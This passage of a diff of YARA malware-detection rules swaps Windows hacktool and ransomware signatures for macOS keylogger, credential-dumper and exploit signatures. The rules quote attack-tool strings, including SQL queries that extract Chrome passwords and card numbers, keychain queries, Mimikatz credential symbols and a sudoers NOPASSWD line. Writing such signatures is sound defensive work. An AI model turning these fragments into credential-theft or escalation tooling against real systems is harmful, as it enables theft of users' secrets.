-		$s1 = "This really isn't applicable unless you are using WMImplant interactively." fullword ascii wide
-		$s2 = "What command do you want to run on the remote system? >" fullword ascii wide
-		$s3 = "Do you want to [create] or [delete] a string registry value? >" fullword ascii wide
-		$s4 = "Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >" fullword ascii wide
-		$s5 = "What is the name of the service you are targeting? >" fullword ascii wide
-		$s6 = "This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine" fullword ascii wide
-		$s7 = "gen_cli - Generate the CLI command to execute a command via WMImplant" fullword ascii wide
-		$s8 = "exit - Exit WMImplant" fullword ascii wide
-		$s9 = "Lateral Movement Facilitation" fullword ascii wide
-		$s10 = "vacant_system - Determine if a user is away from the system." fullword ascii wide
-		$s11 = "Please provide the ProcessID or ProcessName flag to specify the process to kill!" fullword ascii wide
+		$a1 = "/var/log/keystroke.log" wide ascii
+		$a2 = "ERROR: Unable to create event tap." wide ascii
+		$a3 = "Keylogging has begun." wide ascii
+		$a4 = "ERROR: Unable to open log file. Ensure that you have the proper permissions." wide ascii
 
 	condition:
-		any of them
+		2 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Rdp_Cmd_Delivery
+rule BINARYALERT_Hacktool_Macos_Manwhoami_Osxchromedecrypt
 {
 	meta:
-		description = "Delivers a text payload via RDP (rubber ducky)"
-		author = "@fusionrace"
-		id = "8d035721-34ee-566f-8851-1c9501de2704"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_rdp_cmd_delivery.yara#L1-L14"
+		description = "Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X."
+		author = "@mimeframe"
+		id = "874cc999-d9c2-5017-83ec-e4be8a659476"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/manwhoami/OSXChromeDecrypt"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_osxchromedecrypt.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "98bc02bb651fba069828b5960ee47542828f0d530e5e280b15abb0573b8e0168"
+		logic_hash = "0974c6a5e7875e20380df0f58bf22a589b9a5c718e635ec77b42060abcf99473"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "Usage: rdp-cmd-delivery.sh OPTIONS" ascii wide
-		$s2 = "[--tofile 'c:\\test.txt' local.ps1 #will copy contents of local.ps1 to c:\\test.txt" ascii wide
-		$s3 = "-cmdfile local.bat                #will execute everything from local.bat" ascii wide
-		$s4 = "To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console" ascii wide
+		$a1 = "Credit Cards for Chrome Profile" wide ascii
+		$a2 = "Passwords for Chrome Profile" wide ascii
+		$a3 = "Unknown Card Issuer" wide ascii
+		$a4 = "ERROR getting Chrome Safe Storage Key" wide ascii
+		$b1 = "select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards" wide ascii
+		$b2 = "select username_value, password_value, origin_url, submit_element from logins" wide ascii
 
 	condition:
-		any of them
+		3 of ( $a* ) or all of ( $b* )
 }
-rule BINARYALERT_Hacktool_Windows_Ncc_Wmicmd
+rule BINARYALERT_Hacktool_Macos_Keylogger_Giacomolaw
 {
 	meta:
-		description = "Command shell wrapper for WMI"
+		description = "A simple keylogger for macOS."
 		author = "@mimeframe"
-		id = "18bc36f7-b97a-5bce-a68b-c349713e9468"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://github.com/nccgroup/WMIcmd"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_ncc_wmicmd.yara#L1-L18"
+		id = "81fcf792-a0a9-5b97-a71c-4c517a7b910c"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/GiacomoLaw/Keylogger"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_giacomolaw.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "bef6828a706dcfc3b573523fccd391a5ef3fa505235b1621a82527d64d32aaf0"
+		logic_hash = "45ca583c07b8593ed716306ae6f80eef1c3fc5652aed739454fa8007fae929b4"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "Need to specify a username, domain and password for non local connections" wide ascii
-		$a2 = "WS-Management is running on the remote host" wide ascii
-		$a3 = "firewall (if enabled) allows connections" wide ascii
-		$a4 = "WARNING: Didn't see stdout output finished marker - output may be truncated" wide ascii
-		$a5 = "Command sleep in milliseconds - increase if getting truncated output" wide ascii
-		$b1 = "0x800706BA" wide ascii
-		$b2 = "NTLMDOMAIN:" wide ascii
-		$b3 = "cimv2" wide ascii
+		$a1 = "ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions." wide ascii
+		$a2 = "ERROR: Unable to create event tap." wide ascii
+		$a3 = "Keystrokes are now being recorded" wide ascii
 
 	condition:
-		any of ( $a* ) or all of ( $b* )
+		2 of ( $a* )
 }
-rule BINARYALERT_Hacktool_Windows_Mimikatz_Sekurlsa
+rule BINARYALERT_Hacktool_Macos_Macpmem
 {
 	meta:
-		description = "Mimikatz credential dump tool"
-		author = "@fusionrace"
-		id = "08fe62c5-f7a4-5985-a298-1d3c2c1744d4"
+		description = "MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers."
+		author = "@mimeframe"
+		id = "4890598e-936c-5a4d-9004-88ff4fe57c49"
 		date = "2017-08-11"
 		modified = "2017-08-11"
-		reference = "https://github.com/gentilkiwi/mimikatz"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_mimikatz_sekurlsa.yara#L1-L18"
+		reference = "https://github.com/google/rekall/tree/master/tools/osx/MacPmem"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_macpmem.yara#L3-L22"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "24e958c3cbda8e01dc2d84b3059114ea23f4b38db1676f7b72e5eabfa52b7335"
+		logic_hash = "d64b5a5423932211e3b72d949028f3f0ed1f1435e9584cffa947f2bd4846c29b"
 		score = 75
 		quality = 80
 		tags = ""
-		SHA256_1 = "09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669"
-		SHA256_2 = "004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c"
 
 	strings:
-		$s1 = "dpapisrv!g_MasterKeyCacheList" fullword ascii wide
-		$s2 = "lsasrv!g_MasterKeyCacheList" fullword ascii wide
-		$s3 = "!SspCredentialList" ascii wide
-		$s4 = "livessp!LiveGlobalLogonSessionList" fullword ascii wide
-		$s5 = "wdigest!l_LogSessList" fullword ascii wide
-		$s6 = "tspkg!TSGlobalCredTable" fullword ascii wide
+		$a1 = "%s/MacPmem.kext" wide ascii
+		$a2 = "The Pmem physical memory imager." wide ascii
+		$a3 = "The OSXPmem memory imager." wide ascii
+		$a4 = "These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs." wide ascii
+		$a5 = "Pmem driver version incompatible. Reported" wide ascii
+		$a6 = "Memory access driver left loaded since you specified the -l flag." wide ascii
+		$b1 = "Unloading MacPmem" wide ascii
+		$b2 = "MacPmem load tag is" wide ascii
 
 	condition:
-		all of them
+		BINARYALERT_Macho_PRIVATE and 2 of ( $a* ) or all of ( $b* )
 }
-
-rule BINARYALERT_Hacktool_Windows_Cobaltstrike_Artifact_Exe : FILE
+rule BINARYALERT_Hacktool_Macos_Exploit_Tpwn
 {
 	meta:
-		description = "Detection of the Artifact payload from Cobalt Strike"
-		author = "@javutin, @joseselvi"
-		id = "ca92eea2-ad19-56df-af73-bebfc3690377"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "https://www.cobaltstrike.com/help-artifact-kit"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_artifact.yara#L6-L17"
+		description = "tpwn exploits a null pointer dereference in XNU to escalate privileges to root."
+		author = "@mimeframe"
+		id = "b69c4e1c-554e-5553-9b21-6cdf33aff24e"
+		date = "2017-09-14"
+		modified = "2017-09-14"
+		reference = "https://www.rapid7.com/db/modules/exploit/osx/local/tpwn"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_tpwn.yara#L1-L14"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f2f3b9936041cb4bb4b5613d2522553b9835704e1be52993e757fc0edbdd7871"
+		logic_hash = "f864d8c137746edd50526b1d3d95a7335f776cf1473d2d2ea28856dbc515dd9f"
 		score = 75
-		quality = 55
-		tags = "FILE"
+		quality = 80
+		tags = ""
+
+	strings:
+		$a1 = "[-] Couldn't find a ROP gadget, aborting." wide ascii
+		$a2 = "leaked kaslr slide," wide ascii
+		$a3 = "didn't get root, but this system is vulnerable." wide ascii
+		$a4 = "Escalating privileges! -qwertyoruiop" wide ascii
 
 	condition:
-		BINARYALERT_Cobaltstrike_Template_Exe_PRIVATE and filesize < 100KB and pe.sections [ pe.section_index ( ".data" ) ] . raw_data_size > 512 and math.entropy ( pe.sections [ pe.section_index ( ".data" ) ] . raw_data_offset , 512 ) >= 7
+		2 of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Lazarus_Wannacry : FILE
+rule BINARYALERT_Hacktool_Macos_Keylogger_Logkext
 {
 	meta:
-		description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
-		author = "Costin G. Raiu, Kaspersky Lab"
-		id = "6335bd03-0625-5856-891c-9a5decd7e00f"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://twitter.com/neelmehta/status/864164081116225536"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_lazarus_wannacry.yara#L3-L32"
+		description = "LogKext is an open source keylogger for Mac OS X, a product of FSB software."
+		author = "@mimeframe"
+		id = "2e4ad9d0-5780-5a28-a76d-baac401b0648"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/SlEePlEs5/logKext"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_logkext.yara#L1-L25"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "dddff5f74bf3f11baf1d3853d6cb5e5b1e0c5e75445c421d4d5145f7a496fc4b"
+		logic_hash = "f0e3a7ea8ec4568c319e44f00d71fb368948b6fe08bdf86de4b33f0d2bafbb44"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		md5_1 = "9c7c7149387a1c79679a87dd1ba755bc"
-		md5_2 = "ac21c8ad899727137c4b94458d7aa8d8"
+		tags = ""
 
 	strings:
-		$a1 = {
-        51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
-        04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01
-        46 56 E8
-        }
-		$a2 = {
-        03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
-        10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
-        30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
-        38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
-        44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
-        68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
-        FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
-        08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
-        10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
-        2B C0 2C C0 FF FE
-        }
+		$a1 = "logKextPassKey" wide ascii
+		$a2 = "Couldn't get system keychain:" wide ascii
+		$a3 = "Error finding secret in keychain" wide ascii
+		$a4 = "com_fsb_iokit_logKext" wide ascii
+		$b1 = "logKext Password:" wide ascii
+		$b2 = "Logging controls whether the daemon is logging keystrokes (default is on)." wide ascii
+		$c1 = "logKextPassKey" wide ascii
+		$c2 = "Error: couldn't create secAccess" wide ascii
+		$d1 = "IOHIKeyboard" wide ascii
+		$d2 = "Clear keyboards called with kextkeys" wide ascii
+		$d3 = "Added notification for keyboard" wide ascii
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) ) and all of them
+		3 of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* )
 }
-rule BINARYALERT_Ransomware_Windows_Petya_Variant_2
+rule BINARYALERT_Hacktool_Macos_Keylogger_Dannvix
 {
 	meta:
-		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
-		author = "@fusionrace"
-		id = "6401fd7e-5ef7-58b5-b8d3-a63c70e8daa3"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_2.yara#L1-L17"
+		description = "A simple keylogger for macOS."
+		author = "@mimeframe"
+		id = "598d6dbc-540d-5f96-8bd1-c15e6194012e"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/dannvix/keylogger-osx"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_dannvix.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "71b6a493388e7d0b40c83ce903bc6b04"
-		logic_hash = "7e04ffd0423cd1288af5c045bb06930abb732c0ea059e329cafc05faecb4f982"
+		logic_hash = "95d0540b1308caf3e7287c70a759954650220192800c0154d225bcb01ed55766"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "dllhost.dat" fullword wide
-		$s2 = "\\\\%ws\\admin$\\%ws" fullword wide
-		$s3 = "%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\"" fullword wide
-		$s4 = "\\\\.\\PhysicalDrive" fullword wide
-		$s5 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip." fullword wide
+		$a1 = "/var/log/keystroke.log" wide ascii
+		$a2 = "<forward-delete>" wide ascii
+		$a3 = "<unknown>" wide ascii
 
 	condition:
-		3 of them
+		all of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Cerber_Evasion
+rule BINARYALERT_Hacktool_Macos_Exploit_Cve_5889
 {
 	meta:
-		description = "Cerber Ransomware: Evades detection by machine learning applications"
-		author = "@fusionrace"
-		id = "6e2f44a9-bc0f-5071-9d80-ddfb778cfe5d"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "http://www.darkreading.com/vulnerabilities---threats/cerber-ransomware-now-evades-machine-learning/d/d-id/1328506"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cerber_evasion.yara#L1-L15"
+		description = "No description has been set in the source file - BinaryAlert"
+		author = "@mimeframe"
+		id = "ea70d31c-1b70-5927-ba8d-e13d2114e74e"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://www.exploit-db.com/exploits/38371/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_cve_2015_5889.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "bc62b557d48f3501c383f25d014f22df"
-		logic_hash = "43b3b8be5a23b57f6c671abd8491cdc51af1cf3a3fe8a7be308150697cdb92ea"
+		logic_hash = "b455759ea369cdcf2f05a2735a38000179ebe644667016cd635dfad9beda4459"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "38oDr5.vbs" fullword ascii wide
-		$s2 = "8ivq.dll" fullword ascii wide
-		$s3 = "jmsctls_progress32" fullword ascii wide
+		$a1 = "/etc/sudoers" fullword wide ascii
+		$a2 = "/etc/crontab" fullword wide ascii
+		$a3 = "* * * * * root echo" wide ascii
+		$a4 = "ALL ALL=(ALL) NOPASSWD: ALL" wide ascii
+		$a5 = "/usr/bin/rsh" fullword wide ascii
+		$a6 = "localhost" fullword wide ascii
 
 	condition:
-		all of them
+		all of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Zcrypt
+rule BINARYALERT_Hacktool_Macos_Keylogger_Eldeveloper_Keystats
 {
 	meta:
-		description = "Zcrypt will encrypt data and append the .zcrypt extension to the filenames"
-		author = "@fusionrace"
-		id = "d79cd266-4e77-562c-975c-8bf72efe7242"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://blog.malwarebytes.com/threat-analysis/2016/06/zcrypt-ransomware/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara#L1-L23"
+		description = "A simple keylogger for macOS."
+		author = "@mimeframe"
+		id = "7fddb502-ae2d-5e14-95f5-115498fa5926"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/ElDeveloper/keystats"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_eldeveloper_keystats.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "d1e75b274211a78d9c5d38c8ff2e1778"
-		logic_hash = "df4073363da162e69f29493b5bfb4cb3f3d342357335c13ba6a3ac868607cb25"
+		logic_hash = "c73f5ca2ba0a1bde7c1f9b96173938e40511e12f875c4d850d6d498c63e89385"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = ""
 
 	strings:
-		$u1 = "How to Buy Bitcoins" ascii wide
-		$u2 = "ALL YOUR PERSONAL FILES ARE ENCRYPTED" ascii wide
-		$u3 = "Click Here to Show Bitcoin Address" ascii wide
-		$u4 = "MyEncrypter2.pdb" fullword ascii wide
-		$g1 = ".p7b" fullword ascii wide
-		$g2 = ".p7c" fullword ascii wide
-		$g3 = ".pdd" fullword ascii wide
-		$g4 = ".pef" fullword ascii wide
-		$g5 = ".pem" fullword ascii wide
-		$g6 = "How to decrypt files.html" fullword ascii wide
+		$a1 = "YVBKeyLoggerPerishedNotification" wide ascii
+		$a2 = "YVBKeyLoggerPerishedByLackOfResponseNotification" wide ascii
+		$a3 = "YVBKeyLoggerPerishedByUserChangeNotification" wide ascii
 
 	condition:
-		any of ( $u* ) or all of ( $g* )
+		2 of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Powerware_Locky
+rule BINARYALERT_Hacktool_Macos_Keylogger_Skreweverything_Swift
 {
 	meta:
-		description = "PowerWare Ransomware"
-		author = "@fusionrace"
-		id = "8a1a56af-7a9d-54ed-90b9-daf33735ee1e"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://researchcenter.paloaltonetworks.com/2016/07/unit42-powerware-ransomware-spoofing-locky-malware-family/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_powerware_locky.yara#L1-L17"
+		description = "It is a simple and easy to use keylogger for macOS written in Swift."
+		author = "@mimeframe"
+		id = "a4918bc3-d3f0-59f4-894f-fd34ee944fac"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/SkrewEverything/Swift-Keylogger"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_skreweverything_swift.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "3433a4da9d8794709630eb06afd2b8c1"
-		logic_hash = "64de34755f706a9fd4c876c473eed4f8922a4450c7ef135b0ab5e49c67363baf"
+		logic_hash = "f400b8ec392417e7443e82a2c2a9adfc868b9795aa1fb29f91d228f6f94efd13"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = ""
 
 	strings:
-		$s0 = "ScriptRunner.dll" fullword ascii wide
-		$s1 = "ScriptRunner.pdb" fullword ascii wide
-		$s2 = "fixed.ps1" fullword ascii wide
+		$a1 = "Can't create directories!" wide ascii
+		$a2 = "Can't create manager" wide ascii
+		$a3 = "Can't open HID!" wide ascii
+		$a4 = "PRINTSCREEN" wide ascii
+		$a5 = "LEFTARROW" wide ascii
 
 	condition:
-		all of them
+		4 of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Petya_Variant_1
+rule BINARYALERT_Hacktool_Macos_Ptoomey3_Keychain_Dumper
 {
 	meta:
-		description = "Petya Ransomware new variant June 2017 using ETERNALBLUE"
-		author = "@fusionrace"
-		id = "bf56c0e4-585c-509b-a182-a93c74be7524"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_petya_variant_1.yara#L1-L18"
+		description = "Keychain dumping utility."
+		author = "@mimeframe"
+		id = "c45abbbe-f5fe-5a87-acd4-dcdb99ceec28"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/ptoomey3/Keychain-Dumper"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_ptoomey3_keychain_dumper.yara#L1-L15"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "71b6a493388e7d0b40c83ce903bc6b04"
-		logic_hash = "3733834ee2271a483739b09c4222d222aa4899cab48fd8fc558bdbd9a66bf2d6"
+		logic_hash = "f2ef979e4682ce617b37f7503ec2ca520e657b4f6d15a75afad59b62191a1a43"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$s1 = "Ooops, your important files are encrypted." fullword ascii wide
-		$s2 = "Send your Bitcoin wallet ID and personal installation key to e-mail" fullword ascii wide
-		$s3 = "wowsmith123456@posteo.net. Your personal installation key:" fullword ascii wide
-		$s4 = "Send $300 worth of Bitcoin to following address:" fullword ascii wide
-		$s5 = "have been encrypted.  Perhaps you are busy looking for a way to recover your" fullword ascii wide
-		$s6 = "need to do is submit the payment and purchase the decryption key." fullword ascii wide
+		$a1 = "keychain_dumper" wide ascii
+		$a2 = "/var/Keychains/keychain-2.db" wide ascii
+		$a3 = "<key>keychain-access-groups</key>" wide ascii
+		$a4 = "SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet" wide ascii
+		$a5 = "dumpEntitlements" wide ascii
 
 	condition:
-		any of them
+		all of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Hydracrypt
+rule BINARYALERT_Hacktool_Macos_Keylogger_B4Rsby_Swiftlog
 {
 	meta:
-		description = "HydraCrypt encrypts a victim’s files and appends the filenames with the extension “hydracrypt_ID_*"
-		author = "@fusionrace"
-		id = "9ebf205e-b6a9-55a3-b0c3-9b088790dc9a"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/hydracrypt-variant-of-ransomware-distributed-by-angler-exploit-kit/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara#L1-L16"
+		description = "Dirty user level command line keylogger hacked together in Swift."
+		author = "@mimeframe"
+		id = "b1ae8284-04a0-5818-9997-0e31eb51ed2b"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/b4rsby/SwiftLog"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_b4rsby_swiftlog.yara#L1-L11"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "08b304d01220f9de63244b4666621bba"
-		logic_hash = "3ecb3e6c269f4145e60b0e7bb0e896120ceb2db2123f847bf4bdf5d4490467d5"
+		logic_hash = "c66dcab2da0e543198f97ca104c13533c8950d10b6f7cbd3f906348d0f8c45ff"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$u0 = "oTraining" fullword ascii wide
-		$u1 = "Stop Training" fullword ascii wide
-		$u2 = "Play \"sound.wav\"" fullword ascii wide
-		$u3 = "&Start Recording" fullword ascii wide
-		$u4 = "7About record" fullword ascii wide
+		$a1 = "You need to enable the keylogger in the System Prefrences" wide ascii
 
 	condition:
-		all of them
+		all of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Cryptolocker
+rule BINARYALERT_Hacktool_Macos_Keylogger_Roxlu_Ofxkeylogger
 {
 	meta:
-		description = "The CryptoLocker malware propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts files stored on local and mounted network drives"
-		author = "@fusionrace"
-		id = "be205f4b-d078-5437-bacc-203c816db2fa"
-		date = "2017-08-11"
-		modified = "2017-08-11"
-		reference = "https://www.secureworks.com/research/cryptolocker-ransomware"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/ransomware/windows/ransomware_windows_cryptolocker.yara#L1-L21"
+		description = "ofxKeylogger keylogger."
+		author = "@mimeframe"
+		id = "c0e00b76-9623-5709-b64b-0afe006eba60"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/roxlu/ofxKeylogger"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_roxlu_ofxkeylogger.yara#L1-L13"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		hash = "012d9088558072bc3103ab5da39ddd54"
-		logic_hash = "317cbc01b4c329befeb5b25478f7827298a26d21b872ae232c519febd9c547fc"
+		logic_hash = "6e2579a10327cc8f1799848b3bcbcd95733a31098faeb849df6ebf99f1ffe808"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$u0 = "Paysafecard is an electronic payment method for predominantly online shopping" fullword ascii wide
-		$u1 = "bb to select the method of payment and the currency." fullword ascii wide
-		$u2 = "Where can I purchase a MoneyPak?" fullword ascii wide
-		$u3 = "Ukash is electronic cash and e-commerce brand." fullword ascii wide
-		$u4 = "You have to send below specified amount to Bitcoin address" fullword ascii wide
-		$u5 = "cashU is a prepaid online" fullword ascii wide
-		$u6 = "Your important files \\b encryption" fullword ascii wide
-		$u7 = "Encryption was produced using a \\b unique\\b0  public key" fullword ascii wide
-		$u8 = "then be used to pay online, or loaded on to a prepaid card or eWallet." fullword ascii wide
-		$u9 = "Arabic online gamers and e-commerce buyers." fullword ascii wide
+		$a1 = "keylogger_init" wide ascii
+		$a2 = "install_keylogger_hook function not found in dll." wide ascii
+		$a3 = "keylogger_set_callback" wide ascii
 
 	condition:
-		2 of them
+		all of ( $a* )
 }
-rule BINARYALERT_Ransomware_Windows_Hddcryptora
+rule BINARYALERT_Hacktool_Macos_Manwhoami_Mmetokendecrypt
 {
 	meta:
-		description = "The HDDCryptor ransomware encrypts local harddisks as well as resources in network shares via Server Message Block (SMB)"
-		author = "@fusionrace"
-		id = "56d7f1f5-811d-58c9-9e1d-d2f48c01e167"
-		date = "2017-08-11"
